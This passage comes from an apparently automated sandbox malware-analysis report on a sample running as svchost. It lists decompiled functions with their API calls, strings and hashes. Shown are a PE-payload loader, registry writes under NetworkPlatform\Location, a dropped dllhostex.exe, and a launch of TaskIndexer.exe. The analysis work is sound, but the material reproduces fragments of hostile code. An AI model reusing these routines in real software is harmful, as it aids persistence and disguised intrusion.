                                                • API ID: CloseCreateErrorLastValue_strncpy
                                                • String ID: SYSTEM\CurrentControlSet\Services\$Type
                                                • API String ID: 803288783-1299366428
                                                • Opcode ID: 18cb19c89dc955b6750b95740b9316bc7d9f23a47e1589b64649eccfc301a35a
                                                • Instruction ID: 91ff7d8202ac33760edb5902ef728d25bb0700969f3ca7de5feb9f0254dda472
                                                • Opcode Fuzzy Hash: 18cb19c89dc955b6750b95740b9316bc7d9f23a47e1589b64649eccfc301a35a
                                                • Instruction Fuzzy Hash: 0F11E17454031AEBEF218F689C88BFAB778EF06318F4001E8E505A6141DB307A589BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03996B20 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 110memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996B3A
                                                • IsBadHugeReadPtr.KERNEL32(-FC63E248,000000F8), ref: 03996B69
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996542
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996564
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996578
                                                • VirtualAlloc.KERNELBASE(?,?,00003000,00000004,?,039973C2,?,?,00000000,00000000), ref: 03996B8C
                                                Strings
                                                • Invalid payload: , xrefs: 03996BEC
                                                • Could not allocate memory in the current process, xrefs: 03996B98
                                                • Could not copy PE file, xrefs: 03996BC4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead$AllocVirtual
                                                • String ID: Could not allocate memory in the current process$Could not copy PE file$Invalid payload:
                                                • API String ID: 328734856-732701330
                                                • Opcode ID: 2cbf35462c7b6a9d9c20017c99af6a0a6b6be52ba1971971e795b322abca6642
                                                • Instruction ID: 388d96eca3fe86b8c4b515f5cf3138ee165f9cdcbe3746dbe8b0220e90628be5
                                                • Opcode Fuzzy Hash: 2cbf35462c7b6a9d9c20017c99af6a0a6b6be52ba1971971e795b322abca6642
                                                • Instruction Fuzzy Hash: 3E21E6767087065BFE11E6ADEC41A6B739DEFC06B8B14007BE504CB241FB62E80186A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03997E10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00020019,?), ref: 03997E32
                                                • RegQueryValueExA.KERNELBASE(00000000,IPC,00000000,00000000,00000000,?), ref: 03997E64
                                                • RegQueryValueExA.KERNELBASE(00000000,IPC,00000000,00000000,00000000,00000000,?,?,73B76490), ref: 03997EA0
                                                • RegCloseKey.ADVAPI32(00000000,?,?,73B76490), ref: 03997EB6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: QueryValue$CloseOpen
                                                • String ID: IPC$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1586453840-2057897715
                                                • Opcode ID: c612c0e4873d2a0b49b10bca01ac6173cecc5b1c8215fa9f771cd8ff3bf55516
                                                • Instruction ID: 161c36f488c43f8702b293fcbcda29fae17505708d87b11d6a3c0fb549c3f600
                                                • Opcode Fuzzy Hash: c612c0e4873d2a0b49b10bca01ac6173cecc5b1c8215fa9f771cd8ff3bf55516
                                                • Instruction Fuzzy Hash: 1A114F75B4420CBFEF20DED5ED46FADB7BCEB40700F140095BC04E6291E771AA15AA64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD54160 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E6FD54160(char* _a8) {
				void* _v8;
				int _v12;
				int _t10;
				long _t12;

				_v8 = 0;
				_v12 = 1;
				_t10 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows NT\\CurrentVersion\\NetworkPlatform\\Location", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v12); // executed
				if(_t10 != 0) {
					L3:
					return 0;
				} else {
					_t12 = RegSetValueExA(_v8, "LastBackup", _t10, 3, _a8, 0x380); // executed
					_push(_v8);
					if(_t12 == 0) {
						RegCloseKey();
						return 1;
					} else {
						RegCloseKey();
						goto L3;
					}
				}
			}







                                                0x6fd54169
                                                0x6fd54174
                                                0x6fd54193
                                                0x6fd5419b
                                                0x6fd541c3
                                                0x6fd541c8
                                                0x6fd5419d
                                                0x6fd541b0
                                                0x6fd541b6
                                                0x6fd541bb
                                                0x6fd541c9
                                                0x6fd541d7
                                                0x6fd541bd
                                                0x6fd541bd
                                                0x00000000
                                                0x6fd541bd
                                                0x6fd541bb

                                                APIs
                                                • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location,00000000,00000000,00000000,000F003F,00000000,00000000,73B76490), ref: 6FD54193
                                                • RegSetValueExA.KERNELBASE(00000000,LastBackup,00000000,00000003,00000380,00000380), ref: 6FD541B0
                                                • RegCloseKey.ADVAPI32(00000000), ref: 6FD541BD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 6FD541C9
                                                Strings
                                                • LastBackup, xrefs: 6FD541A8
                                                • Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location, xrefs: 6FD54189
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Close$CreateValue
                                                • String ID: LastBackup$Software\Microsoft\Windows NT\CurrentVersion\NetworkPlatform\Location
                                                • API String ID: 1009429713-3284959219
                                                • Opcode ID: 4297d587a6a3a3954bd7b1c46033f24c5f6733575c57588bbf4c28ad0d27124c
                                                • Instruction ID: 0615d26e5040502a8f3d5ba7deec95d3e6f3ca7d385b51510eb1913787bcd1bc
                                                • Opcode Fuzzy Hash: 4297d587a6a3a3954bd7b1c46033f24c5f6733575c57588bbf4c28ad0d27124c
                                                • Instruction Fuzzy Hash: CCF04931640208BBFF209BA0CD0AFA97BACAB05B15F100194BA04E9185DAB1BA24A665
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0399868A Relevance: 9.1, APIs: 6, Instructions: 87COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: dllmain_crt_dispatchdllmain_raw
                                                • String ID:
                                                • API String ID: 1382799047-0
                                                • Opcode ID: 88ddd8615a635302d763df8f37c5a4af67e515094449471d617280c226cafcb1
                                                • Instruction ID: 42f81da08cc26b5a889d230c3ea5ea1703827568f0a2efd0cfc679126018924a
                                                • Opcode Fuzzy Hash: 88ddd8615a635302d763df8f37c5a4af67e515094449471d617280c226cafcb1
                                                • Instruction Fuzzy Hash: 0D213176D09325BBEF21EF6D8C8096F6A6DAFC7AA0B0D094FF9152B101C63585118BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03996F10 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 110sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 03996F75
                                                • Sleep.KERNELBASE(000003E8,?,?,?,?,?,?,00000009,039BCAE8,00000000), ref: 039970AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DirectorySleepSystem
                                                • String ID: $%s\%s.exe$svchost
                                                • API String ID: 2556431487-1837889624
                                                • Opcode ID: 95fd5aafcdf33f4b5af0d08d940e10b42ebf29b346ea964f5ee1d3784e0e1382
                                                • Instruction ID: 77474b914f8bc02a178a92280fdc21add3be57041f00b2492e87a156f840db35
                                                • Opcode Fuzzy Hash: 95fd5aafcdf33f4b5af0d08d940e10b42ebf29b346ea964f5ee1d3784e0e1382
                                                • Instruction Fuzzy Hash: DA4150B5D40318ABEF20DB98DC89BDDB7B8EB44714F1002DAE519AB281DB745B84CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 03997860 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\dllhostex.exe,40000000,00000002,00000000,00000002,00000080,00000000,73B76490,00000000,00000001,00000000,?,03997C1E), ref: 03997889
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,03997C1E), ref: 0399789E
                                                • CloseHandle.KERNEL32(00000000,?,03997C1E), ref: 039978A9
                                                • CloseHandle.KERNEL32(00000000,?,03997C1E), ref: 039978BF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID: C:\Windows\system32\dllhostex.exe
                                                • API String ID: 3602564925-2014199763
                                                • Opcode ID: efe2d6015bd8339f1b77a77957746f139c0a7ccda7a32718bfb76921546d340d
                                                • Instruction ID: 2163ad3d98f175e6bf0aca0cd70bdf16081293fbf03f8b6eed9b412c7d1bd526
                                                • Opcode Fuzzy Hash: efe2d6015bd8339f1b77a77957746f139c0a7ccda7a32718bfb76921546d340d
                                                • Instruction Fuzzy Hash: 8B11293572D3447EFB24E26EAD4AFA73B9CDBC4244F04406AF9058E286EB719D0083A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 039913C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • new.LIBCMT ref: 039913DC
                                                • GetStartupInfoA.KERNEL32(?), ref: 039913FD
                                                • CreateProcessA.KERNELBASE(C:\Windows\system32\TaskIndexer.exe,00000000,00000000,00000000,00000000,00000040,00000000,00000000,00000044,00000000,?,?,?,?,73B75870,00000000), ref: 0399142D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInfoProcessStartup
                                                • String ID: C:\Windows\system32\TaskIndexer.exe$D
                                                • API String ID: 525363069-3853640166
                                                • Opcode ID: 6301b7f3f4afd57234a41420451a44cb94afe2dc1a2fae4e2e767947041b92c2
                                                • Instruction ID: bcf70f09291224c463ba794e9b2728f3a9e289355159fd9aed10f8c4346bcb27
                                                • Opcode Fuzzy Hash: 6301b7f3f4afd57234a41420451a44cb94afe2dc1a2fae4e2e767947041b92c2
                                                • Instruction Fuzzy Hash: 950184B1A403087AEB20DBE59D46F9E76AC9F45B00F200116B708FA1C0E6B5AD4046A8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD53FA0 Relevance: 7.6, APIs: 5, Instructions: 144memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E6FD53FA0(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __edi;
				void* __esi;
				void* _t46;
				void* _t49;
				signed int _t51;
				intOrPtr _t52;
				intOrPtr _t56;
				signed int _t59;
				signed int _t60;
				long _t65;
				intOrPtr _t68;
				long _t70;
				void* _t71;
				intOrPtr _t72;
				void* _t73;

				_t68 = 0;
				_v20 = __edx;
				_t64 = __ecx;
				_v12 = __ecx;
				_t76 = __edx;
				if(__edx <= 0) {
					L11:
					if( *0x6fd6ac98 <= 0) {
						goto L13;
					} else {
						return 1;
					}
				} else {
					while(1) {
						_t56 = E6FD559AF(_t68, _t76, 0x58);
						_v16 = _t56;
						E6FD57920(_t64, _t56, 0, 0x58);
						asm("movups xmm0, [esi+edi]");
						asm("movups [ebx], xmm0");
						asm("movups xmm0, [esi+edi+0x10]");
						asm("movups [ebx+0x10], xmm0");
						asm("movups xmm0, [esi+edi+0x20]");
						asm("movups [ebx+0x20], xmm0");
						asm("movups xmm0, [esi+edi+0x30]");
						asm("movups [ebx+0x30], xmm0");
						asm("movups xmm0, [esi+edi+0x40]");
						_v8 = _t68 + 0x50;
						asm("movups [ebx+0x40], xmm0");
						_t70 =  *(_t56 + 0xc);
						_t65 =  *(_t56 + 0x38);
						 *((intOrPtr*)(_t56 + 0x50)) = LocalAlloc(0x40, _t70);
						 *((intOrPtr*)(_t56 + 0x54)) = LocalAlloc(0x40, _t65);
						E6FD5FDE0( *((intOrPtr*)(_t56 + 0x50)), _v8 + _v12, _t70);
						_v8 = _v8 + _t70;
						E6FD5FDE0( *((intOrPtr*)(_t56 + 0x54)), _v8 + _t70 + _v12, _t65);
						_v8 = _v8 + _t65;
						_t46 = LocalAlloc(0x40,  *(_t56 + 0xc) + 0x50);
						asm("movups xmm0, [ebx]");
						_t71 = _t46;
						asm("movups [esi], xmm0");
						_t19 = _t71 + 0x50; // 0x50
						asm("movups xmm0, [ebx+0x10]");
						asm("movups [esi+0x10], xmm0");
						asm("movups xmm0, [ebx+0x20]");
						asm("movups [esi+0x20], xmm0");
						asm("movups xmm0, [ebx+0x30]");
						asm("movups [esi+0x30], xmm0");
						asm("movups xmm0, [ebx+0x40]");
						asm("movups [esi+0x40], xmm0");
						E6FD5FDE0(_t19,  *((intOrPtr*)(_t56 + 0x50)),  *(_t56 + 0xc));
						_t49 = E6FD53DF0(_t71,  *(_t56 + 0xc) + 0x50,  *((intOrPtr*)(_t56 + 0x54)),  *(_t56 + 0x38)); // executed
						_t73 = _t73 + 0x44;
						LocalFree(_t71); // executed
						if(_t49 == 0) {
							break;
						}
						_t51 =  *0x6fd6ac9c; // 0x14
						_t59 =  *0x6fd6ac98; // 0x14
						if(_t51 > _t59) {
							_t52 =  *0x6fd6ac94; // 0x304ebb8
							goto L9;
						} else {
							_t72 =  *0x6fd6ac94; // 0x304ebb8
							_push(0x28 + _t51 * 4);
							_t52 = E6FD58E7B(_t59);
							_t73 = _t73 + 4;
							 *0x6fd6ac94 = _t52;
							if(_t52 != 0) {
								if(_t72 != 0) {
									_t60 =  *0x6fd6ac9c; // 0x14
									E6FD5FDE0(_t52, _t72, _t60 << 2);
									L6FD58E76(_t72);
									_t52 =  *0x6fd6ac94; // 0x304ebb8
									_t73 = _t73 + 0x10;
								}
								 *0x6fd6ac9c =  *0x6fd6ac9c + 0xa;
								_t59 =  *0x6fd6ac98; // 0x14
								L9:
								 *((intOrPtr*)(_t52 + _t59 * 4)) = _v16;
								 *0x6fd6ac98 =  *0x6fd6ac98 + 1;
							}
						}
						_t68 = _v8;
						_t64 = _v12;
						if(_t68 < _v20) {
							continue;
						} else {
							goto L11;
						}
						goto L14;
					}
					L13:
					__eflags = 0;
					return 0;
				}
				L14:
			}






















                                                0x6fd53faa
                                                0x6fd53fac
                                                0x6fd53fb0
                                                0x6fd53fb2
                                                0x6fd53fb5
                                                0x6fd53fb7
                                                0x6fd5413a
                                                0x6fd54141
                                                0x00000000
                                                0x6fd54145
                                                0x6fd5414b
                                                0x6fd5414b
                                                0x6fd53fc0
                                                0x6fd53fc0
                                                0x6fd53fc9
                                                0x6fd53fce
                                                0x6fd53fd1
                                                0x6fd53fd6
                                                0x6fd53fdd
                                                0x6fd53fe0
                                                0x6fd53fe5
                                                0x6fd53fe9
                                                0x6fd53fee
                                                0x6fd53ff2
                                                0x6fd53ff7
                                                0x6fd53ffb
                                                0x6fd54003
                                                0x6fd54006
                                                0x6fd5400a
                                                0x6fd5400d
                                                0x6fd5401c
                                                0x6fd54025
                                                0x6fd54033
                                                0x6fd5403d
                                                0x6fd54048
                                                0x6fd5404d
                                                0x6fd5405c
                                                0x6fd54062
                                                0x6fd54065
                                                0x6fd54067
                                                0x6fd5406a
                                                0x6fd5406d
                                                0x6fd54071
                                                0x6fd54075
                                                0x6fd54079
                                                0x6fd5407d
                                                0x6fd54081
                                                0x6fd54085
                                                0x6fd54089
                                                0x6fd54094
                                                0x6fd540a1
                                                0x6fd540a6
                                                0x6fd540ac
                                                0x6fd540b4
                                                0x00000000
                                                0x00000000
                                                0x6fd540ba
                                                0x6fd540bf
                                                0x6fd540c7
                                                0x6fd5411a
                                                0x00000000
                                                0x6fd540c9
                                                0x6fd540c9
                                                0x6fd540d6
                                                0x6fd540d7
                                                0x6fd540dc
                                                0x6fd540df
                                                0x6fd540e6
                                                0x6fd540ea
                                                0x6fd540ec
                                                0x6fd540f8
                                                0x6fd540fe
                                                0x6fd54103
                                                0x6fd54108
                                                0x6fd54108
                                                0x6fd5410b
                                                0x6fd54112
                                                0x6fd5411f
                                                0x6fd54122
                                                0x6fd54125
                                                0x6fd54125
                                                0x6fd540e6
                                                0x6fd5412b
                                                0x6fd5412e
                                                0x6fd54134
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd54134
                                                0x6fd5414e
                                                0x6fd5414e
                                                0x6fd54154
                                                0x6fd54154
                                                0x00000000

                                                APIs
                                                • new.LIBCMT ref: 6FD53FC2
                                                • LocalAlloc.KERNEL32(00000040,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD54013
                                                • LocalAlloc.KERNEL32(00000040,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD5401F
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,73B76490,?,?,?,?,6FD54903), ref: 6FD5405C
                                                  • Part of subcall function 6FD53DF0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?,?,?,?,?,?,?,?,73B76490), ref: 6FD53E05
                                                • LocalFree.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,73B76490), ref: 6FD540AC
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: Local$Alloc$AcquireContextCryptFree
                                                • String ID:
                                                • API String ID: 966490891-0
                                                • Opcode ID: dea0d23dff8ec06d204dec1a73a5da738fb96a94733743da0b9103da62bd4185
                                                • Instruction ID: 384773e467cc5dafb7dcc4e35370beef1e0a46e36d66a498089afa5249fff2f3
                                                • Opcode Fuzzy Hash: dea0d23dff8ec06d204dec1a73a5da738fb96a94733743da0b9103da62bd4185
                                                • Instruction Fuzzy Hash: 3151C635D00B54EBEF418F68C941ABA7774FF56318F059249ED486B106EB31BAE4CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD54330 Relevance: 6.3, APIs: 5, Instructions: 69COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 79%
                                                			E6FD54330() {
				intOrPtr* _t15;
				void* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t25;
				intOrPtr _t27;
				intOrPtr* _t31;
				intOrPtr _t33;
				void* _t34;
				void* _t35;
				void* _t47;

				EnterCriticalSection(0x6fd6ac7c);
				_t23 = 0;
				_t34 =  *0x6fd6ac98 - _t23; // 0x14
				if(_t34 <= 0) {
					L21:
					LeaveCriticalSection(0x6fd6ac7c);
					return _t15;
				} else {
					do {
						_t31 = 0;
						_t35 = _t23 -  *0x6fd6ac98; // 0x14
						if(_t35 < 0) {
							_t33 =  *0x6fd6ac94; // 0x304ebb8
							_t31 =  *((intOrPtr*)(_t33 + _t23 * 4));
						}
						_t27 =  *_t31;
						if(_t27 == 0x153 || _t27 == 0x20e || _t27 == 0x213 || _t27 == 0x1a7 || _t27 == 0x1ac) {
							_t24 =  *(_t31 + 0x50);
							if(_t24 != 0) {
								 *(_t31 + 8) = 0;
								 *(_t31 + 0xc) = 0;
								LocalFree(_t24);
								_t15 = __imp__LocalFree; // 0x73b75870
								 *(_t31 + 0x50) = 0;
							}
							_t25 =  *(_t31 + 0x54);
							if(_t25 != 0) {
								 *_t15(_t25);
								 *(_t31 + 0x54) = 0;
							}
						}
						if(_t27 == 0x1b2 || _t27 == 0x2e3) {
							_t17 =  *(_t31 + 0x50);
							if(_t17 != 0) {
								 *(_t31 + 8) = 0;
								 *(_t31 + 0xc) = 0;
								LocalFree(_t17); // executed
								 *(_t31 + 0x50) = 0;
							}
							_t18 =  *(_t31 + 0x54);
							if(_t18 != 0) {
								LocalFree(_t18);
								 *(_t31 + 0x54) = 0;
							}
						}
						_t15 = LocalFree;
						_t23 = _t23 + 1;
						_t47 = _t23 -  *0x6fd6ac98; // 0x14
					} while (_t47 < 0);
					goto L21;
				}
			}















                                                0x6fd54336
                                                0x6fd5433c
                                                0x6fd5433e
                                                0x6fd54344
                                                0x6fd5441d
                                                0x6fd54422
                                                0x6fd54429
                                                0x6fd5434a
                                                0x6fd54351
                                                0x6fd54351
                                                0x6fd54353
                                                0x6fd54359
                                                0x6fd5435b
                                                0x6fd54361
                                                0x6fd54361
                                                0x6fd54364
                                                0x6fd5436c
                                                0x6fd5438e
                                                0x6fd54393
                                                0x6fd54396
                                                0x6fd5439d
                                                0x6fd543a4
                                                0x6fd543a6
                                                0x6fd543ab
                                                0x6fd543ab
                                                0x6fd543b2
                                                0x6fd543b7
                                                0x6fd543ba
                                                0x6fd543bc
                                                0x6fd543bc
                                                0x6fd543b7
                                                0x6fd543c9
                                                0x6fd543d3
                                                0x6fd543de
                                                0x6fd543e1
                                                0x6fd543e8
                                                0x6fd543ef
                                                0x6fd543f1
                                                0x6fd543f1
                                                0x6fd543f8
                                                0x6fd543fd
                                                0x6fd54400
                                                0x6fd54402
                                                0x6fd54402
                                                0x6fd543fd
                                                0x6fd54409
                                                0x6fd5440e
                                                0x6fd5440f
                                                0x6fd5440f
                                                0x00000000
                                                0x6fd5441c

                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC7C,?,6FD54933), ref: 6FD54336
                                                • LocalFree.KERNELBASE(?,73B76490,?,?,6FD54933), ref: 6FD543A4
                                                • LocalFree.KERNELBASE(?,73B76490,?,?,6FD54933), ref: 6FD543EF
                                                • LocalFree.KERNEL32(?,73B76490,?,?,6FD54933), ref: 6FD54400
                                                • LeaveCriticalSection.KERNEL32(6FD6AC7C,?,6FD54933), ref: 6FD54422
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: FreeLocal$CriticalSection$EnterLeave
                                                • String ID:
                                                • API String ID: 2406571278-0
                                                • Opcode ID: 075f6523e18c8c0ce678730647888f341e0c227d040e92f895f59e8c1b685c81
                                                • Instruction ID: 6babcb44d7bf08d2eace5625177f0699ff644a46107e96dffb6d5ca20ff2df66
                                                • Opcode Fuzzy Hash: 075f6523e18c8c0ce678730647888f341e0c227d040e92f895f59e8c1b685c81
                                                • Instruction Fuzzy Hash: 8C21AF79A40B10CBFFA0AF54C4A4BAA73E4BF42724F05041DD49A87660C778B478CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 6FD55320 Relevance: 6.1, APIs: 4, Instructions: 54sleepCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 87%
                                                			E6FD55320() {
				char _v8;
				char _v12;
				intOrPtr _t16;
				intOrPtr _t25;
				intOrPtr* _t27;
				intOrPtr* _t34;
				signed int _t35;

				while(1) {
					EnterCriticalSection(0x6fd6ac2c);
					_t25 =  *0x6fd6ac48; // 0x0
					_t35 = 0;
					if(_t25 == 0) {
						goto L10;
					} else {
						goto L2;
					}
					do {
						L2:
						_t34 = 0;
						if(_t35 < _t25) {
							_t16 =  *0x6fd6ac44; // 0x0
							_t34 =  *((intOrPtr*)(_t16 + _t35 * 4));
						}
						if( *((intOrPtr*)(_t34 + 4)) > 0) {
							if((0x10624dd3 * GetTickCount() >> 0x20 >> 6) -  *((intOrPtr*)(_t34 + 4)) >= 0xf) {
								_t27 =  *0x6fd6b718; // 0x3017218
								_push( &_v12);
								 *((intOrPtr*)(_t34 + 4)) = 0;
								_push( &_v8);
								_push( *_t34);
								_v8 = 0;
								_v12 = 0;
								if( *((intOrPtr*)( *((intOrPtr*)( *_t27 + 4))))() != 0) {
									E6FD54CC0(_v8, _t35);
								}
							}
							_t25 =  *0x6fd6ac48; // 0x0
						}
						_t35 = _t35 + 1;
					} while (_t35 < _t25);
					L10:
					LeaveCriticalSection(0x6fd6ac2c);
					Sleep(0x7530); // executed
				}
			}










                                                0x6fd55330
                                                0x6fd55335
                                                0x6fd5533b
                                                0x6fd55341
                                                0x6fd55345
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6fd55347
                                                0x6fd55347
                                                0x6fd55347
                                                0x6fd5534b
                                                0x6fd5534d
                                                0x6fd55352
                                                0x6fd55352
                                                0x6fd55359
                                                0x6fd5536f
                                                0x6fd55371
                                                0x6fd5537a
                                                0x6fd5537b
                                                0x6fd55385
                                                0x6fd55388
                                                0x6fd5538a
                                                0x6fd55391
                                                0x6fd5539f
                                                0x6fd553a4
                                                0x6fd553a4
                                                0x6fd5539f
                                                0x6fd553a9
                                                0x6fd553a9
                                                0x6fd553af
                                                0x6fd553b0
                                                0x6fd553b4
                                                0x6fd553b9
                                                0x6fd553c4
                                                0x6fd553c4

                                                APIs
                                                • EnterCriticalSection.KERNEL32(6FD6AC2C), ref: 6FD55335
                                                • GetTickCount.KERNEL32 ref: 6FD5535B
                                                • LeaveCriticalSection.KERNEL32(6FD6AC2C), ref: 6FD553B9
                                                • Sleep.KERNELBASE(00007530), ref: 6FD553C4
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$CountEnterLeaveSleepTick
                                                • String ID:
                                                • API String ID: 2162194193-0
                                                • Opcode ID: 2303f0fbe840f1073342db82e1bee6407e0de3c1d9691f9303f6ef85eef4c8b5
                                                • Instruction ID: f66a2140ae0cc1d7e35067d7c900df9189bb59189062077cd7c9b6675b5f6fa1
                                                • Opcode Fuzzy Hash: 2303f0fbe840f1073342db82e1bee6407e0de3c1d9691f9303f6ef85eef4c8b5
